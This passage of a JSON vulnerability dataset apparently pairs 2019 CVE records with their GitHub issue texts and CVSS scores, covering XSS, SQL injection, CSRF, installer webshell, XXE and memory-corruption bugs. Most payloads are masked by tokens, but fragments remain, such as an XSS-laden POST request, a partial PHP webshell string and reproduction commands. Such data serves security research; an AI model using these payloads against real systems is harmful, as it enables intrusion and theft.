  44195. "description": "There are Storage type xss vulnerabilities in the add administrator NUMBERTAG Presence address POST APITAG NUMBERTAG data pack POST APITAG HTTP NUMBERTAG Host: localhost NUMBERTAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: URLTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG f NUMBERTAG e8ae3d NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG APITAG Connection: close APITAG Content Disposition: form data; name=\"username\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"password\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"repassword\" '> APITAG alert NUMBERTAG APITAG APITAG NUMBERTAG Proof screenshot \u622a\u56fe\u89c1: FILETAG",
  44196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44197. "severity": "MEDIUM",
  44198. "baseScore": 6.1,
  44199. "impactScore": 2.7,
  44200. "exploitabilityScore": 2.8
  44201. },
  44202. {
  44203. "CVE_ID": "CVE-2019-7568",
  44204. "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/2",
  44205. "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/2",
  44206. "Repo_new": "baijiacms/baijiacmsv4",
  44207. "Issue_Created_At": "2019-01-08T07:03:58Z",
  44208. "description": "Two Vulnerability of Time based SQL injection NUMBERTAG description Two time based SQL blinds to get data NUMBERTAG POC First: URLTAG second: URLTAG NUMBERTAG description request the url: URLTAG No time delay Screenshot: FILETAG request the url: URLTAG time delay Screenshot: FILETAG Test with sqlmap: FILETAG",
  44209. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44210. "severity": "CRITICAL",
  44211. "baseScore": 9.8,
  44212. "impactScore": 5.9,
  44213. "exploitabilityScore": 3.9
  44214. },
  44215. {
  44216. "CVE_ID": "CVE-2019-7569",
  44217. "Issue_Url_old": "https://github.com/millken/doyocms/issues/1",
  44218. "Issue_Url_new": "https://github.com/millken/doyocms/issues/1",
  44219. "Repo_new": "millken/doyocms",
  44220. "Issue_Created_At": "2019-01-17T13:42:28Z",
  44221. "description": "There is a CSRF vulnerability that can add the super administrator account . After the super administrator logged in, open the following page poc\uff1a APITAG add a super administrator CODETAG",
  44222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44223. "severity": "HIGH",
  44224. "baseScore": 8.8,
  44225. "impactScore": 5.9,
  44226. "exploitabilityScore": 2.8
  44227. },
  44228. {
  44229. "CVE_ID": "CVE-2019-7581",
  44230. "Issue_Url_old": "https://github.com/libming/libming/issues/173",
  44231. "Issue_Url_new": "https://github.com/libming/libming/issues/173",
  44232. "Repo_new": "libming/libming",
  44233. "Issue_Created_At": "2019-01-17T09:18:12Z",
  44234. "description": "Memory allocation failure in APITAG (parser.c NUMBERTAG different from NUMBERTAG ersion: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
  44235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44236. "severity": "HIGH",
  44237. "baseScore": 8.8,
  44238. "impactScore": 5.9,
  44239. "exploitabilityScore": 2.8
  44240. },
  44241. {
  44242. "CVE_ID": "CVE-2019-7582",
  44243. "Issue_Url_old": "https://github.com/libming/libming/issues/172",
  44244. "Issue_Url_new": "https://github.com/libming/libming/issues/172",
  44245. "Repo_new": "libming/libming",
  44246. "Issue_Created_At": "2019-01-17T09:17:38Z",
  44247. "description": "Memory allocation failure in APITAG APITAG version: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
  44248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44249. "severity": "HIGH",
  44250. "baseScore": 8.8,
  44251. "impactScore": 5.9,
  44252. "exploitabilityScore": 2.8
  44253. },
  44254. {
  44255. "CVE_ID": "CVE-2019-7585",
  44256. "Issue_Url_old": "https://github.com/caokang/waimai/issues/11",
  44257. "Issue_Url_new": "https://github.com/caokang/waimai/issues/11",
  44258. "Repo_new": "caokang/waimai",
  44259. "Issue_Created_At": "2019-01-17T08:03:07Z",
  44260. "description": "A Time based blind SQL Injection in email check. When registering a new account, it will verify that the email address is being used. PATHTAG ERRORTAG We can bypass the SQL filter using this payload: APITAG FILETAG The final SQL statement would be APITAG And here is the exp to obtain admin's password hash: CODETAG",
  44261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44262. "severity": "CRITICAL",
  44263. "baseScore": 9.8,
  44264. "impactScore": 5.9,
  44265. "exploitabilityScore": 3.9
  44266. },
  44267. {
  44268. "CVE_ID": "CVE-2019-7648",
  44269. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/2",
  44270. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/2",
  44271. "Repo_new": "fantasticlbp/hotels_server",
  44272. "Issue_Created_At": "2019-01-20T15:01:48Z",
  44273. "description": "Using of BASE NUMBERTAG Encoding for storage of password and retrieval of password. The application uses B NUMBERTAG encoding for storage of password Obscuring a password with a trivial encoding does not protect the password. FILETAG CVETAG URLTAG",
  44274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44275. "severity": "HIGH",
  44276. "baseScore": 7.5,
  44277. "impactScore": 3.6,
  44278. "exploitabilityScore": 3.9
  44279. },
  44280. {
  44281. "CVE_ID": "CVE-2019-7649",
  44282. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/41",
  44283. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/41",
  44284. "Repo_new": "arterli/cmswing",
  44285. "Issue_Created_At": "2019-02-17T18:32:15Z",
  44286. "description": "Encryption of password using MD5 and fixed salt. APITAG = function(password, md5encoded) { md5encoded = md5encoded || false; password = md5encoded ? password : APITAG return APITAG + password + APITAG };",
  44287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44288. "severity": "HIGH",
  44289. "baseScore": 7.5,
  44290. "impactScore": 3.6,
  44291. "exploitabilityScore": 3.9
  44292. },
  44293. {
  44294. "CVE_ID": "CVE-2019-7662",
  44295. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1872",
  44296. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1872",
  44297. "Repo_new": "webassembly/binaryen",
  44298. "Issue_Created_At": "2019-01-16T07:22:23Z",
  44299. "description": "Assertion failed were discovered in APITAG in wasm APITAG Hi there, Multiple Assertion failed were discovered in APITAG in wasm binary.cpp Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG $git log CODETAG The output was shown as follow: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44301. "severity": "MEDIUM",
  44302. "baseScore": 6.5,
  44303. "impactScore": 3.6,
  44304. "exploitabilityScore": 2.8
  44305. },
  44306. {
  44307. "CVE_ID": "CVE-2019-7697",
  44308. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/351",
  44309. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/351",
  44310. "Repo_new": "axiomatic-systems/bento4",
  44311. "Issue_Created_At": "2019-01-01T09:47:39Z",
  44312. "description": "Multiple Assertion failed were discovered in APITAG ) in APITAG Hi there, Multiple Assertion failed were discovered in APITAG ) in APITAG Here are the POC files. Please use \"./mp NUMBERTAG hls $POC\" to reproduce the error. FILETAG The output were shown as follow: CODETAG",
  44313. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44314. "severity": "MEDIUM",
  44315. "baseScore": 6.5,
  44316. "impactScore": 3.6,
  44317. "exploitabilityScore": 2.8
  44318. },
  44319. {
  44320. "CVE_ID": "CVE-2019-7698",
  44321. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/354",
  44322. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/354",
  44323. "Repo_new": "axiomatic-systems/bento4",
  44324. "Issue_Created_At": "2019-01-01T10:46:25Z",
  44325. "description": "when running mp4dump, there is a out of memory problem in APITAG in APITAG Hi, there. I test the program at the master branch. ERRORTAG An Out of Memory problem was discovered in function APITAG in APITAG The program tries to allocate with a large number size NUMBERTAG eff NUMBERTAG bytes) of memory. Please use the \"./mp4dump $POC\" to reproduce the bug. FILETAG",
  44326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44327. "severity": "MEDIUM",
  44328. "baseScore": 6.5,
  44329. "impactScore": 3.6,
  44330. "exploitabilityScore": 2.8
  44331. },
  44332. {
  44333. "CVE_ID": "CVE-2019-7699",
  44334. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/355",
  44335. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/355",
  44336. "Repo_new": "axiomatic-systems/bento4",
  44337. "Issue_Created_At": "2019-01-01T11:33:09Z",
  44338. "description": "When running avcinfo, a heap buffer overflow occur in function APITAG in APITAG Hi, there. A Heap buffer overflow problem was discovered in function APITAG char const , unsigned int) in APITAG A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./avcinfo $POC\" to reproduce the error. FILETAG ERRORTAG $ git log ERRORTAG",
  44339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44340. "severity": "MEDIUM",
  44341. "baseScore": 6.5,
  44342. "impactScore": 3.6,
  44343. "exploitabilityScore": 2.8
  44344. },
  44345. {
  44346. "CVE_ID": "CVE-2019-7701",
  44347. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1863",
  44348. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1863",
  44349. "Repo_new": "webassembly/binaryen",
  44350. "Issue_Created_At": "2019-01-12T11:46:51Z",
  44351. "description": "A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm.. Hi, there. A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG $ git log ERRORTAG",
  44352. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44353. "severity": "MEDIUM",
  44354. "baseScore": 6.5,
  44355. "impactScore": 3.6,
  44356. "exploitabilityScore": 2.8
  44357. },
  44358. {
  44359. "CVE_ID": "CVE-2019-7702",
  44360. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1867",
  44361. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1867",
  44362. "Repo_new": "webassembly/binaryen",
  44363. "Issue_Created_At": "2019-01-13T12:08:46Z",
  44364. "description": "Null pointer Deference in APITAG in wasm s APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG in wasm s APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \" APITAG \" or \" APITAG \" to reproduce the problem. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44365. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44366. "severity": "MEDIUM",
  44367. "baseScore": 6.5,
  44368. "impactScore": 3.6,
  44369. "exploitabilityScore": 2.8
  44370. },
  44371. {
  44372. "CVE_ID": "CVE-2019-7703",
  44373. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1865",
  44374. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1865",
  44375. "Repo_new": "webassembly/binaryen",
  44376. "Issue_Created_At": "2019-01-12T12:32:49Z",
  44377. "description": "A Use after free problem in APITAG ) function in wasm APITAG Hi, there. A Use after free problem was discovered in APITAG ) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm merge $POC\" to reproduce the error. FILETAG $ git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44378. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44379. "severity": "MEDIUM",
  44380. "baseScore": 6.5,
  44381. "impactScore": 3.6,
  44382. "exploitabilityScore": 2.8
  44383. },
  44384. {
  44385. "CVE_ID": "CVE-2019-7704",
  44386. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1866",
  44387. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1866",
  44388. "Repo_new": "webassembly/binaryen",
  44389. "Issue_Created_At": "2019-01-12T12:56:27Z",
  44390. "description": "Out of Memory Problem in function APITAG long). Hi, there. A Out of Memory problem was discovered in APITAG long) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too NUMBERTAG Program Abort because of std::bad_alloc exception. Use \"./wasm merge $POC\" to reproduce the error. FILETAG Program Output APITAG The ASAN dumps the stack trace as follows: ERRORTAG NUMBERTAG possibly invalid request for silly amounts of memory Use \"wasm opt $POC\" to reproduce the error. FILETAG Program Output ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44391. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44392. "severity": "MEDIUM",
  44393. "baseScore": 6.5,
  44394. "impactScore": 3.6,
  44395. "exploitabilityScore": 2.8
  44396. },
  44397. {
  44398. "CVE_ID": "CVE-2019-7719",
  44399. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/138",
  44400. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/138",
  44401. "Repo_new": "dignajar/nibbleblog",
  44402. "Issue_Created_At": "2019-01-28T02:55:24Z",
  44403. "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG text = '<?php $_USER FILETAG exploit: URLTAG FILETAG",
  44404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44405. "severity": "CRITICAL",
  44406. "baseScore": 9.8,
  44407. "impactScore": 5.9,
  44408. "exploitabilityScore": 3.9
  44409. },
  44410. {
  44411. "CVE_ID": "CVE-2019-7720",
  44412. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/1",
  44413. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/1",
  44414. "Repo_new": "taogogo/taocms",
  44415. "Issue_Created_At": "2019-01-28T14:34:00Z",
  44416. "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG APITAG $_POST FILETAG exploit: URLTAG FILETAG",
  44417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44418. "severity": "CRITICAL",
  44419. "baseScore": 9.8,
  44420. "impactScore": 5.9,
  44421. "exploitabilityScore": 3.9
  44422. },
  44423. {
  44424. "CVE_ID": "CVE-2019-7721",
  44425. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/14",
  44426. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/14",
  44427. "Repo_new": "gnat/nc-cms",
  44428. "Issue_Created_At": "2019-01-29T02:46:52Z",
  44429. "description": "There is an vulnerability in the filesystem that can get a webshell . Hello, I found that this cms may have some security problem(use default file storage) Source: PATHTAG function APITAG $data) { $path = PATHTAG $fh = APITAG 'w') or ERRORTAG not open file: \".$name.\". Make sure that this server has read and write permissions the /nc cms/content APITAG fwrite($fh, $data); fclose($fh); } PATHTAG else if($action == 'save') { $this APITAG if(isset($_GET FILETAG",
  44430. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44431. "severity": "HIGH",
  44432. "baseScore": 7.5,
  44433. "impactScore": 3.6,
  44434. "exploitabilityScore": 3.9
  44435. },
  44436. {
  44437. "CVE_ID": "CVE-2019-7722",
  44438. "Issue_Url_old": "https://github.com/pmd/pmd/issues/1650",
  44439. "Issue_Url_new": "https://github.com/pmd/pmd/issues/1650",
  44440. "Repo_new": "pmd/pmd",
  44441. "Issue_Created_At": "2019-02-11T11:58:33Z",
  44442. "description": "core] Advisory XXE attack on ruleset parsing. This issue is for future reference. As part of an unrelated security concern discussion regarding a possible remote code execution (which was discarded as impossible) on a [separate issue URLTAG , I found that our XML parsing wasn't hardened, allowing for XXE attacks. When PMD is run, the ruleset XMLs were parsed with the default Java parser settings, which allowed an attacker to perform an XXE attack. Rulesets can be either local files, or accessed through the network over http / https. So, depending on the context, this attack could require physical access to the machine, or be achieved through a man in the middle attack. The XXE attack can be used to perform information disclosure on the developer's machine, CI servers or other infrastructure running PMD; as well as denial of service attacks and request forgery. All PMD versions up to PMD NUMBERTAG are vulnerable. A fix was produced in URLTAG following OWASP XXE Prevention cheatsheet URLTAG , making all PMD NUMBERTAG releases and later safe.",
  44443. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44444. "severity": "HIGH",
  44445. "baseScore": 8.1,
  44446. "impactScore": 5.9,
  44447. "exploitabilityScore": 2.2
  44448. },
  44449. {
  44450. "CVE_ID": "CVE-2019-7732",
  44451. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/20",
  44452. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/20",
  44453. "Repo_new": "rgaufman/live555",
  44454. "Issue_Created_At": "2019-02-11T04:57:50Z",
  44455. "description": "There is a memory leak in function APITAG which can cause a APITAG In the lastest version of live NUMBERTAG there is a memory leak issue. The attacker can make the server crash with this issue. when parse the setup packet with many username fileds, the value of username will be duplicated many times at NUMBERTAG The pointers of username value can't be freed ever, except for the last one. The fileds realm nonce uri response have the same problem. CODETAG",
  44456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44457. "severity": "HIGH",
  44458. "baseScore": 7.5,
  44459. "impactScore": 3.6,
  44460. "exploitabilityScore": 3.9
  44461. },
  44462. {
  44463. "CVE_ID": "CVE-2019-7733",
  44464. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/21",
  44465. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/21",
  44466. "Repo_new": "rgaufman/live555",
  44467. "Issue_Created_At": "2019-02-11T05:37:29Z",
  44468. "description": "There is a buffer overflow which can lead to dos in live NUMBERTAG When parse the request packet in function APITAG the code don't check the APITAG , and use it in memmove. Finally cause the buff overflow. ERRORTAG There is a APITAG check, but it only assigns APITAG to false. This can't avoid the memmove . CODETAG I can make the server crash with a simple packet. CODETAG",
  44469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44470. "severity": "HIGH",
  44471. "baseScore": 7.5,
  44472. "impactScore": 3.6,
  44473. "exploitabilityScore": 3.9
  44474. },
  44475. {
  44476. "CVE_ID": "CVE-2019-7737",
  44477. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/10",
  44478. "Issue_Url_new": "https://github.com/verytops/verydows/issues/10",
  44479. "Repo_new": "verytops/verydows",
  44480. "Issue_Created_At": "2019-02-11T15:44:47Z",
  44481. "description": "CSRF Vulnerability that can add admin user. A CSRF vulnerability was found in this cms. Logged in administrator user may add another administrator account by clicking following POC APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  44482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44483. "severity": "HIGH",
  44484. "baseScore": 8.8,
  44485. "impactScore": 5.9,
  44486. "exploitabilityScore": 2.8
  44487. },
  44488. {
  44489. "CVE_ID": "CVE-2019-7738",
  44490. "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/3",
  44491. "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/3",
  44492. "Repo_new": "cooltey/c.p.sub",
  44493. "Issue_Created_At": "2018-09-20T16:50:57Z",
  44494. "description": "CSRF Delete an announcement article arbitrarily. Hey , APITAG In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the \"get\" parameter value is very dangerous. List\uff1a URLTAG Poc Payload\uff1a > GET APITAG HTTP NUMBERTAG Host: your_website > Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG > Accept Encoding: gzip, deflate > Accept Language: zh TW,zh; APITAG US; APITAG > Cookie: APITAG APITAG wp settings NUMBERTAG mfold NUMBERTAG Do; wp settings time NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG > Connection: close FILETAG Poc Payload\uff1a CODETAG",
  44495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44496. "severity": "MEDIUM",
  44497. "baseScore": 6.5,
  44498. "impactScore": 3.6,
  44499. "exploitabilityScore": 2.8
  44500. },
  44501. {
  44502. "CVE_ID": "CVE-2019-7753",
  44503. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/11",
  44504. "Issue_Url_new": "https://github.com/verytops/verydows/issues/11",
  44505. "Repo_new": "verytops/verydows",
  44506. "Issue_Created_At": "2019-02-12T09:43:29Z",
  44507. "description": "XSS vulnerability which can steal admin's cookies or more!. In page APITAG where users' visiting are logged, we can modify the POST parameter \"referrer\" which will be shown without filtering to administrator. As a result, hacker can construct a XSS payload to steal admin's cookies! payload: FILETAG result: FILETAG",
  44508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44509. "severity": "MEDIUM",
  44510. "baseScore": 6.1,
  44511. "impactScore": 2.7,
  44512. "exploitabilityScore": 2.8
  44513. },
  44514. {
  44515. "CVE_ID": "CVE-2019-8334",
  44516. "Issue_Url_old": "https://github.com/gongfuxiang/schoolcms/issues/1",
  44517. "Issue_Url_new": "https://github.com/gongfuxiang/schoolcms/issues/1",
  44518. "Repo_new": "gongfuxiang/schoolcms",
  44519. "Issue_Created_At": "2019-02-13T07:43:01Z",
  44520. "description": "There is three xss vulnerability that can get the administrator cookie.",
  44521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44522. "severity": "MEDIUM",
  44523. "baseScore": 6.1,
  44524. "impactScore": 2.7,
  44525. "exploitabilityScore": 2.8
  44526. },
  44527. {
  44528. "CVE_ID": "CVE-2019-8336",
  44529. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5423",
  44530. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5423",
  44531. "Repo_new": "hashicorp/consul",
  44532. "Issue_Created_At": "2019-03-04T19:17:00Z",
  44533. "description": "TBD.",
  44534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44535. "severity": "HIGH",
  44536. "baseScore": 8.1,
  44537. "impactScore": 5.9,
  44538. "exploitabilityScore": 2.2
  44539. },
  44540. {
  44541. "CVE_ID": "CVE-2019-8347",
  44542. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/4",
  44543. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/4",
  44544. "Repo_new": "source-trace/beescms",
  44545. "Issue_Created_At": "2019-02-14T10:56:52Z",
  44546. "description": "There is a CSRF vulnerability that can add arbitrary VIP accounts. After the administrator logged in, open the following one page. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG URLTAG URLTAG FILETAG",
  44547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44548. "severity": "HIGH",
  44549. "baseScore": 8.8,
  44550. "impactScore": 5.9,
  44551. "exploitabilityScore": 2.8
  44552. },
  44553. {
  44554. "CVE_ID": "CVE-2019-8363",
  44555. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/12",
  44556. "Issue_Url_new": "https://github.com/verytops/verydows/issues/12",
  44557. "Repo_new": "verytops/verydows",
  44558. "Issue_Created_At": "2019-02-14T01:28:45Z",
  44559. "description": "Reflected Cross Site FILETAG . Environment installed from verydows master In page APITAG the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse Payload used: APITAG APITAG Affected URL: URLTAG Navigate to the Affected URL, Payload would be triggered. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. FILETAG",
  44560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44561. "severity": "MEDIUM",
  44562. "baseScore": 6.1,
  44563. "impactScore": 2.7,
  44564. "exploitabilityScore": 2.8
  44565. },
  44566. {
  44567. "CVE_ID": "CVE-2019-8376",
  44568. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/537",
  44569. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/537",
  44570. "Repo_new": "appneta/tcpreplay",
  44571. "Issue_Created_At": "2019-02-12T09:07:37Z",
  44572. "description": "NULL pointer dereference in APITAG . Description we observed a NULL pointer dereference occured in function get_layer NUMBERTAG located at get.c APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44573. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44574. "severity": "HIGH",
  44575. "baseScore": 7.8,
  44576. "impactScore": 5.9,
  44577. "exploitabilityScore": 1.8
  44578. },
  44579. {
  44580. "CVE_ID": "CVE-2019-8377",
  44581. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/536",
  44582. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/536",
  44583. "Repo_new": "appneta/tcpreplay",
  44584. "Issue_Created_At": "2019-02-07T06:58:32Z",
  44585. "description": "NULL pointer dereference APITAG Description we observed a NULL pointer dereference occured in function APITAG located at APITAG APITAG same be triggered by sending a crafted pcap file to the tcpreplay edit binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i $INTERFACE $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44586. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44587. "severity": "HIGH",
  44588. "baseScore": 7.8,
  44589. "impactScore": 5.9,
  44590. "exploitabilityScore": 1.8
  44591. },
  44592. {
  44593. "CVE_ID": "CVE-2019-8378",
  44594. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/363",
  44595. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/363",
  44596. "Repo_new": "axiomatic-systems/bento4",
  44597. "Issue_Created_At": "2019-01-29T07:09:12Z",
  44598. "description": "A heap buffer overflow occured in function APITAG Description we observed a heap buffer overflow occured in function APITAG located in APITAG APITAG same be triggered by sending a crafted file to the podofoimpose binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Degub ASAN REPORT ERRORTAG ERRORTAG",
  44599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44600. "severity": "HIGH",
  44601. "baseScore": 8.8,
  44602. "impactScore": 5.9,
  44603. "exploitabilityScore": 2.8
  44604. },
  44605. {
  44606. "CVE_ID": "CVE-2019-8380",
  44607. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/366",
  44608. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/366",
  44609. "Repo_new": "axiomatic-systems/bento4",
  44610. "Issue_Created_At": "2019-02-07T06:32:20Z",
  44611. "description": "NULL POINTER DEREFERENCE in APITAG Description we observed a NULL pointer dereference occured in APITAG located in APITAG APITAG same be triggered by sending a crafted file to the mp4dump binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  44612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44613. "severity": "HIGH",
  44614. "baseScore": 8.8,
  44615. "impactScore": 5.9,
